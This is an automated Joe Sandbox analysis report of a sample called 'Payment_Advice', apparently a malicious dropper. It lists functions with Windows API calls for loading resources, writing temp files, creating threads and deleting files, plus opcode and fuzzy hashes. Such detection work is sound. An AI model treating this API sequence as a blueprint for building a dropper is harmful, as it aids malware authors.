Part of subcall function 0040DAC0: TlsGetValue.KERNEL32(0000000E), ref: 0040DAD5
Part of subcall function 0040DAC0: SetLastError.KERNEL32(?), ref: 0040DAEB

Part of subcall function 0040DC60: wcslen.MSVCRT ref: 0040DC77

Part of subcall function 0040DB00: RtlReAllocateHeap.NTDLL(031E0000,00000000,?,?), ref: 0040DB5C

GetModuleHandleW.KERNEL32(00000000,?,00000000,00000000), ref: 00403ED2

Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,004033DD,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189

Part of subcall function 00405E30: CharUpperW.USER32(00000000,00000000,FFFFFFF5,00001000,?,?,00001000,004033E5,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00405E81

Part of subcall function 004031B1: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,00403F71,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 004031D9

Part of subcall function 00401EF4: GetTempFileNameW.KERNEL32(00000000,00416020,00000000,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00403F90,00000001,00000000), ref: 00401FC3
Part of subcall function 00401EF4: GetTempFileNameW.KERNEL32(00416020,00000000,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402018

PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403FCB

Part of subcall function 00409500: SetEnvironmentVariableW.KERNEL32(?,?,00403FE8,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00409519

Part of subcall function 0040548C: CreateThread.KERNEL32(00000000,00001000,00000000,00000000,00000000,?), ref: 004054A5
Part of subcall function 0040548C: RtlEnterCriticalSection.NTDLL(00417680), ref: 004054B7
Part of subcall function 0040548C: WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00403140,00000000,00000000,00000000,0000000A,00000001,00000000,00000000,00000000), ref: 004054CE
Part of subcall function 0040548C: CloseHandle.KERNEL32(00000008,?,?,?,?,00403140,00000000,00000000,00000000,0000000A,00000001,00000000,00000000,00000000,00000000,00000000), ref: 004054DA
Part of subcall function 0040548C: RtlLeaveCriticalSection.NTDLL(00417680), ref: 0040551D

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: Value$AllocateCriticalErrorFileHandleHeapLastNameSectionTemp$BackslashCharCloseCreateEnterEnvironmentFindLeaveModuleObjectPathRemoveResourceSingleThreadUpperVariableWaitwcslen
String ID:
API String ID: 1263086577-0
Opcode ID: b82d4a2b996f595ba5c1d763e67e136d9313fe1510dfd2df2d4df1b3f91113b9
Instruction ID: f5a9b2353c4208d2d2e49e7cbb2e39cfe29240165c79b9212fe679793e11b04d
Opcode Fuzzy Hash: b82d4a2b996f595ba5c1d763e67e136d9313fe1510dfd2df2d4df1b3f91113b9
Instruction Fuzzy Hash: 7402AAB5A18300AED200FBB1998197F7BBCEBC8719F10D83FB545A6192C63CD9459B2D

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA00 Relevance: 3.1, APIs: 2, Instructions: 65
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040D0D8: RtlEnterCriticalSection.NTDLL(00000020), ref: 0040D0E3
Part of subcall function 0040D0D8: RtlLeaveCriticalSection.NTDLL(00000020), ref: 0040D15E

CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000,?,00000000,?,?,00000000,0040352F,00000000,00000000,00000000), ref: 0040AA33
RtlAllocateHeap.NTDLL(00000000,00001000), ref: 0040AA55

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: CriticalSection$AllocateCreateEnterFileHeapLeave
String ID:
API String ID: 2608263337-0
Opcode ID: 777222757d6ac8f310b92d6d48f0c472615004c48d60ff8c3faa9f498e70ad84
Instruction ID: 0c7c59af070097b429fff24e53322bbcd4a548db6c14e4240a8466396a0194e3
Opcode Fuzzy Hash: 777222757d6ac8f310b92d6d48f0c472615004c48d60ff8c3faa9f498e70ad84
Instruction Fuzzy Hash: 5B11BE71200700ABC2308F5AED48F57BBE8EBC4724F11823EF495A22E0D7769819CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0040D80A Relevance: 3.1, APIs: 2, Instructions: 61
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040D95D: HeapFree.KERNEL32(00000000,-00000018,00000200,00000000,0040D81B,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00416078,00417070,00000004), ref: 0040D99E

RtlAllocateHeap.NTDLL(00000000,FFFFFFDD), ref: 0040D83A
memset.MSVCRT ref: 0040D875

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: Heap$AllocateFreememset
String ID:
API String ID: 2774703448-0
Opcode ID: eda7e802ff362bb19e632be6cfc426e8d69579a7f719dd62f808040715c8de4f
Instruction ID: 8aac43452d1df7e7ddc7facaec918d90005b782c0e071f0a612a12749f5edab4
Opcode Fuzzy Hash: eda7e802ff362bb19e632be6cfc426e8d69579a7f719dd62f808040715c8de4f
Instruction Fuzzy Hash: D71151729047159BC310EF59DC80A4BBBE8FF98710F05852EF998A7351D734EC048BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040A610 Relevance: 3.0, APIs: 2, Instructions: 31
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapFree.KERNEL32(00000000,?,00000000,00000000,?,?,00403573,00000000,00000000,00000800,00000000,00000000,00000000), ref: 0040A653
FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,00403573,00000000,00000000,00000800,00000000,00000000,00000000), ref: 0040A65B

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: ChangeCloseFindFreeHeapNotification
String ID:
API String ID: 1642550653-0
Opcode ID: f5a6c778e841c6d07bfb9fe52f6eec5ee0cdac25f63fed6a51d379ff9b816c7d
Instruction ID: 65d915e6f26a615e9ac746504162976542945709e128f4b3ee049ec15683c9c4
Opcode Fuzzy Hash: f5a6c778e841c6d07bfb9fe52f6eec5ee0cdac25f63fed6a51d379ff9b816c7d
Instruction Fuzzy Hash: ECF05E72501A11EAC7212B69FC04E8BBF75AF90728F168A3AF154250F8C7369861DA5D

Uniqueness

Uniqueness Score: -1.00%

Function 00401CF6 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0040DC00: TlsGetValue.KERNEL32(0000000E), ref: 0040DC17

RemoveDirectoryW.KERNEL32(00000000,-0000012C,00402464,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000,00416020,00000001,00000000,00000000,00000064), ref: 00401D37
RemoveDirectoryW.KERNEL32(00000000,-0000012C,00402464,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000,00416020,00000001,00000000,00000000,00000064), ref: 00401D42

Part of subcall function 004053C1: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,00401D12,00000000,-0000012C,00402464,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000,00416020), ref: 004053D1

Part of subcall function 00405430: TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401D21,00000000,-0000012C,00402464,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405440
Part of subcall function 00405430: RtlEnterCriticalSection.NTDLL(00417680), ref: 0040544C
Part of subcall function 00405430: RtlLeaveCriticalSection.NTDLL(00417680), ref: 00405480

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: CriticalDirectoryRemoveSection$EnterLeaveObjectSingleTerminateThreadValueWait
String ID:
API String ID: 1205394408-0
Opcode ID: 7a6970a5fb77041d4d3168e70d3ade7ebc212a0fa7f0e6ccd02eabe01376b698
Instruction ID: 20476b7fd3d52acee56ca048645dcf6dc253443faaa17c48622ea349d9d71071
Opcode Fuzzy Hash: 7a6970a5fb77041d4d3168e70d3ade7ebc212a0fa7f0e6ccd02eabe01376b698
Instruction Fuzzy Hash: D6E0BF71458600EAEA157B62DC82D5F7E7AFB18308741983BF450711F3CA3E9C21AA1D

Uniqueness

Uniqueness Score: -1.00%

Function 0040DA70 Relevance: 3.0, APIs: 2, Instructions: 12memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040DA7C
TlsAlloc.KERNEL32 ref: 0040DA87

Part of subcall function 0040E2A0: RtlAllocateHeap.NTDLL(031E0000,00000000,0000000C), ref: 0040E2AE
Part of subcall function 0040E2A0: RtlAllocateHeap.NTDLL(031E0000,00000000,00000010), ref: 0040E2C2
Part of subcall function 0040E2A0: TlsSetValue.KERNEL32(0000000E,00000010,?,?,0040DA97), ref: 0040E2EB

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: Heap$Allocate$AllocCreateValue
String ID:
API String ID: 3361498153-0
Opcode ID: 7c5f9b79d9067cb19e5e9a1cf002baf2bccb3daaf441299b5804332e4ca4ad76
Instruction ID: 47f8b4ae80b8b65a038ebe855d6d80ffa77b4cff93089610e291c5bc18f8e931
Opcode Fuzzy Hash: 7c5f9b79d9067cb19e5e9a1cf002baf2bccb3daaf441299b5804332e4ca4ad76
Instruction Fuzzy Hash: 5CD012745843047BD6012BB2BC0AB843A68B704B55F518835F609962D1E7B4A040C51C

Uniqueness

Uniqueness Score: -1.00%

Function 0040A396 Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(00000002,00000080,0040A3CF,?,00000000,004036AE,?,00000000,-0000012C,?,00401D26,00000000,-0000012C,00402464,00000000,00000001), ref: 0040A3AD
DeleteFileW.KERNELBASE(00000000,0040A3CF,?,00000000,004036AE,?,00000000,-0000012C,?,00401D26,00000000,-0000012C,00402464,00000000,00000001,00000000), ref: 0040A3B7

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: File$AttributesDelete
String ID:
API String ID: 2910425767-0
Opcode ID: 67e6dd9c38358ecc76eafa571f25df48be6776d23c5a607de9f76dedf8e6a781
Instruction ID: bcd68c7d22bf6d3f36b1afe50485083cae1cfc3cb4a765cc3c7ec01f17b42dec
Opcode Fuzzy Hash: 67e6dd9c38358ecc76eafa571f25df48be6776d23c5a607de9f76dedf8e6a781
Instruction Fuzzy Hash: FFD09230018340BAD3565B24ED0DB5ABEA3AB80705F05C939B9C9600F5D779C8A8EB0A

Uniqueness

Uniqueness Score: -1.00%

Function 0040DAA0 Relevance: 3.0, APIs: 2, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

HeapDestroy.KERNELBASE(031E0000), ref: 0040DAA9
TlsFree.KERNELBASE(0000000E), ref: 0040DAB6

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: DestroyFreeHeap
String ID:
API String ID: 3293292866-0
Opcode ID: cc241ee26c244a955ba26ad4d1f9c25b69c0a2df9c06b5d01daa53644d964705
Instruction ID: 6c0bbdb6fa8a3cec8af98e69a1a7bc2ab5198441e8c350e30bac6ed0258a684f
Opcode Fuzzy Hash: cc241ee26c244a955ba26ad4d1f9c25b69c0a2df9c06b5d01daa53644d964705
Instruction Fuzzy Hash: 64C04C75514304BFC6059BE4FC4C8D6377DE7486217428524F60A83261CB75F840CB6C

Uniqueness

Uniqueness Score: -1.00%

Function 0040A680 Relevance: 1.5, APIs: 1, Instructions: 25fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,0040A648,00000000,00000000,?,?,00403573,00000000,00000000,00000800), ref: 0040A6A7

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 812c28a0d7019738ae1f35b3c6f3aca29df1f38680868a56c6d4d116d25541c7
Instruction ID: 314d761c27508dc191a0533bce5f5104cc0eddfe4e0508807eefa5cec89b5f55
Opcode Fuzzy Hash: 812c28a0d7019738ae1f35b3c6f3aca29df1f38680868a56c6d4d116d25541c7
Instruction Fuzzy Hash: B9F0F276104700AFD320CF58D808B87B7E8EB48721F00C82EE59AC2650C730E850DB55

Uniqueness

Uniqueness Score: -1.00%

Function 00402ED5 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(00000000,?,00000000,00000000), ref: 00402EF1

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 08c5476610742d3c05b9e882893e6cd53964fab8079b2f0af00292dd38d2d350
Instruction ID: f5a000ac0987a650bc88b837f8e1ad7b931e53341246efd34f3b0dd6567822eb
Opcode Fuzzy Hash: 08c5476610742d3c05b9e882893e6cd53964fab8079b2f0af00292dd38d2d350
Instruction Fuzzy Hash: 82D05B7044814946D710B765D549B9B72ECD700308F61883AE085965C1F7FCE9D9D69B

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF04 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

TlsFree.KERNELBASE(004011D8,004011AA,00000000,00000000,00000004,00000000,00416068,00000008,0000000C,000186A1,00000007,00416078,00417070,00000004,00000000,00416068), ref: 0040CF21

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: Free
String ID:
API String ID: 3978063606-0
Opcode ID: 9153b61830bc5c081ca362633ad4d17c8b4dba155c9bf8f8010ffa6db1f29739
Instruction ID: cac381de26ac1ecbfe847cb5ae7795da5337e2a804d444a4ad9a96b74f4f3404
Opcode Fuzzy Hash: 9153b61830bc5c081ca362633ad4d17c8b4dba155c9bf8f8010ffa6db1f29739
Instruction Fuzzy Hash: 33C04830518102EEEF26DB15EE4C3E13A73F388346F8982769005A05F0D7788888EE4D

Uniqueness

Uniqueness Score: -1.00%

Function 00409780 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 00409789

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: f3c23c9f1a02c0f35bf23a5f455ff8e12fd2e77267bb951d7bda2937db455f53
Instruction ID: e40eb100870ecceaf34f32dd35deae3931ea825063bd47bde8918add0e90f93b
Opcode Fuzzy Hash: f3c23c9f1a02c0f35bf23a5f455ff8e12fd2e77267bb951d7bda2937db455f53
Instruction Fuzzy Hash: B1B012702843016AE6100F105C06F8035207704F97F104020F205581D4C7E01000C50C

Uniqueness

Uniqueness Score: -1.00%

Function 00409770 Relevance: 1.5, APIs: 1, Instructions: 3memoryCOMMON

Download Yara Rule

APIs

HeapDestroy.KERNELBASE(004011DD,004011AA,00000000,00000000,00000004,00000000,00416068,00000008,0000000C,000186A1,00000007,00416078,00417070,00000004,00000000,00416068), ref: 00409776

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: DestroyHeap
String ID:
API String ID: 2435110975-0
Opcode ID: 9912d0844dff50f247fcf39c854289e29bb08a897189269cadb9df9e7f64dcc5
Instruction ID: d198b2742550b498a5902efb394778fe90b783f14d2b41317c8e928b278f78a2
Opcode Fuzzy Hash: 9912d0844dff50f247fcf39c854289e29bb08a897189269cadb9df9e7f64dcc5
Instruction Fuzzy Hash: 86900230414402EFDE015F14ED189843B31F7403217028070900681030C6214450DA5C

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040EE6A Relevance: 12.1, Strings: 9, Instructions: 840COMMON

Download Yara Rule

Strings

invalid code lengths set, xrefs: 0040EFAF
invalid literal/lengths set, xrefs: 0040F2B6
invalid distance too far back, xrefs: 0040F7B3
invalid bit length repeat, xrefs: 0040F262
invalid code -- missing end-of-block, xrefs: 0040F24C
invalid distance code, xrefs: 0040F706
too many length or distance symbols, xrefs: 0040EFC1
invalid distances set, xrefs: 0040F30C
invalid literal/length code, xrefs: 0040F53E

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID:
String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
API String ID: 0-2665694366
Opcode ID: bae000775f9bd7815902f0e88db16ebb2c7b5e271d13db52e636695b4bdd36e2
Instruction ID: 0c9bada6472bbe44735cf89b17f941580d481906b170b95eadfc3b580f0b70d5
Opcode Fuzzy Hash: bae000775f9bd7815902f0e88db16ebb2c7b5e271d13db52e636695b4bdd36e2
Instruction Fuzzy Hash: EA62DE716047129FC718CF19C4906AAB7E1FFC8314F144A3EE8959BB80D339E869CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00408AF4 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?), ref: 00408B2D
GetWindowLongW.USER32(?,000000EB), ref: 00408B3C
GetWindowTextLengthW.USER32 ref: 00408B4A
RtlAllocateHeap.NTDLL(00000000), ref: 00408B5F
GetWindowTextW.USER32(00000000,00000001), ref: 00408B6F
DestroyWindow.USER32(?), ref: 00408B7D
UnregisterClassW.USER32 ref: 00408B93

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: Window$DestroyText$AllocateClassHeapLengthLongUnregister
String ID:
API String ID: 3947741702-0
Opcode ID: 7eb53a768ae0692c0e473ad2af5927535a428c9096d0e824c458b7024d51298d
Instruction ID: 1db97ccb8ac999b3c200ada4aea9c9f5e5bcba64e28080c0d457fbdc64e0e11f
Opcode Fuzzy Hash: 7eb53a768ae0692c0e473ad2af5927535a428c9096d0e824c458b7024d51298d
Instruction Fuzzy Hash: 64110371104206EFCB115F64FD0C9AA3FBAFB18355B11803AF845A22B4DB3AE915DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040E4A0 Relevance: 9.7, APIs: 1, Strings: 5, Instructions: 666COMMON

Download Yara Rule

Strings

header crc mismatch, xrefs: 0040EB7F
unknown header flags set, xrefs: 0040E6FC
unknown compression method, xrefs: 0040E610, 0040E6E2
invalid window size, xrefs: 0040E686
incorrect header check, xrefs: 0040E69C

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID:
String ID: header crc mismatch$incorrect header check$invalid window size$unknown compression method$unknown header flags set
API String ID: 0-3633268661
Opcode ID: c4c66fda7de8412f0aa7fa3eeee460c1ec12c8efb2a80e123960d1f62bff8657
Instruction ID: 525b8147d3acc8853bf2a87972a1b60ce14e894b89f7916d66050597b8a3605f
Opcode Fuzzy Hash: c4c66fda7de8412f0aa7fa3eeee460c1ec12c8efb2a80e123960d1f62bff8657
Instruction Fuzzy Hash: A742AEB16047029FD718CF2AC48071ABBE1BF84304F148A3EE855AB781D779E966CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00402762 Relevance: 4.5, APIs: 3, Instructions: 25COMMON

Download Yara Rule

APIs

Part of subcall function 0040DC00: TlsGetValue.KERNEL32(0000000E), ref: 0040DC17

LoadResource.KERNEL32(00000000,00000000,00000000,00000000,004031F8,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,00403F71,00000000), ref: 00402773
SizeofResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,004031F8,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402783

Part of subcall function 004097E0: RtlAllocateHeap.NTDLL(00000008,00000000,00403214), ref: 004097F1

Part of subcall function 004098C0: memcpy.MSVCRT ref: 004098D0

FreeResource.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,004031F8,00000000,00000000,0000000A,00000000,00000000,00000000), ref: 004027B2

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: Resource$AllocateFreeHeapLoadSizeofValuememcpy
String ID:
API String ID: 4216414443-0
Opcode ID: 510ed28e8a1359c841441ee93fd11f68d847da0fe598e510e32a073710fc5d0d
Instruction ID: fcd7274207207d3af0726e59b65efc6fb1d53367a80527e38dfdb3b78726baaa
Opcode Fuzzy Hash: 510ed28e8a1359c841441ee93fd11f68d847da0fe598e510e32a073710fc5d0d
Instruction Fuzzy Hash: 3FF07472418202EFDB02AF61DD0192FBAA2FF54704F11883EF494561B1D7768825EF5A

Uniqueness

Uniqueness Score: -1.00%

Function 00410EF0 Relevance: 4.1, Strings: 3, Instructions: 383COMMON

Download Yara Rule

Strings

invalid distance too far back, xrefs: 004112B3
invalid distance code, xrefs: 004112A6
invalid literal/length code, xrefs: 00411295

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID:
String ID: invalid distance code$invalid distance too far back$invalid literal/length code
API String ID: 0-3255898291
Opcode ID: fdc212910d03c255f0785c9543c6bfeff31382a250498d77613c5968644664cf
Instruction ID: 16fbc27c9b1dc0371e0d7abf502359c4addadaafe390a0f1880561ad24822f5d
Opcode Fuzzy Hash: fdc212910d03c255f0785c9543c6bfeff31382a250498d77613c5968644664cf
Instruction Fuzzy Hash: 6FD1C7316083928FC704CF28C48066ABBE2EFD9344F144A6EE9D5CB352D779D98ACB55

Uniqueness

Uniqueness Score: -1.00%

Function 00405594 Relevance: 3.1, APIs: 2, Instructions: 128COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 004055B4

Part of subcall function 0040554D: memset.MSVCRT ref: 0040555C
Part of subcall function 0040554D: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 0040556B
Part of subcall function 0040554D: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040557B

GetVersionExW.KERNEL32(?), ref: 00405613

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: Version$AddressHandleModuleProcmemset
String ID:
API String ID: 3445250173-0
Opcode ID: 686fcf1f1187dd98e7380dabcd6bd3296367d629354b7633eb3422f552863a35
Instruction ID: aad47ed63da79f17f7f6b7383021e7aa7f485cc90ed3282bc036ae210b84c5a1
Opcode Fuzzy Hash: 686fcf1f1187dd98e7380dabcd6bd3296367d629354b7633eb3422f552863a35
Instruction Fuzzy Hash: 3931BEB2A06E6483E23089248C44BAB6698D751760FDA0F37DD9DB72D0D23F8D458D8E

Uniqueness

Uniqueness Score: -1.00%

Function 00409570 Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00409530,0040116F,00000000,00000004,00000000,00416068,00000008,0000000C,000186A1,00000007,00416078,00417070,00000004,00000000,00416068,00000008), ref: 004096AC
SetUnhandledExceptionFilter.KERNEL32(0040116F,00000000,00000004,00000000,00416068,00000008,0000000C,000186A1,00000007,00416078,00417070,00000004,00000000,00416068,00000008,00000008), ref: 004096C0

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 0ba5d56fe5a4be2d67618d1ff13c8c9e558ed1dd890d1823d391dd2db3b1e058
Instruction ID: 595d54128b13282ce533104dcf03d9c77705d08e65dac7c0aa88f55107dea111
Opcode Fuzzy Hash: 0ba5d56fe5a4be2d67618d1ff13c8c9e558ed1dd890d1823d391dd2db3b1e058
Instruction Fuzzy Hash: 23E0CAB0109300EBC310CF20ED0878A7BF5BB88745F01C87AE809922A4E339C880EB1E

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF87 Relevance: 2.9, APIs: 1, Instructions: 1619COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0040AF99

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 5df8cbbafad562d452bea6de10c169acfe4f24b76d1f4d4f6e22def82397cf77
Instruction ID: d0b8817cb56e71a837d19fc95c2fd52927ec86d9229bb37ebdbb9e258e8ee786
Opcode Fuzzy Hash: 5df8cbbafad562d452bea6de10c169acfe4f24b76d1f4d4f6e22def82397cf77
Instruction Fuzzy Hash: CDD23BB2B183008FC748CF29C89165AF7E2BFD8214F4A896DE545DB351DB35E846CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00409590 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(004011C9,004011AA,00000000,00000000,00000004,00000000,00416068,00000008,0000000C,000186A1,00000007,00416078,00417070,00000004,00000000,00416068), ref: 00409596

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f5f836c7c882a8e7230c9b56100d4a77dceb875441ac34891abae756498fd265
Instruction ID: 7a0b4d9ef07032ccfcc3a2ab39acde42ed2479ecfe64f6941f5db4b971619358
Opcode Fuzzy Hash: f5f836c7c882a8e7230c9b56100d4a77dceb875441ac34891abae756498fd265
Instruction Fuzzy Hash: 90B001780183109BDB019F10FC087C43E72B788795F82C1B4980941274D7798454DA08

Uniqueness

Uniqueness Score: -1.00%

Function 0040C4D8 Relevance: .7, Instructions: 674COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID:
String ID:
API String ID:
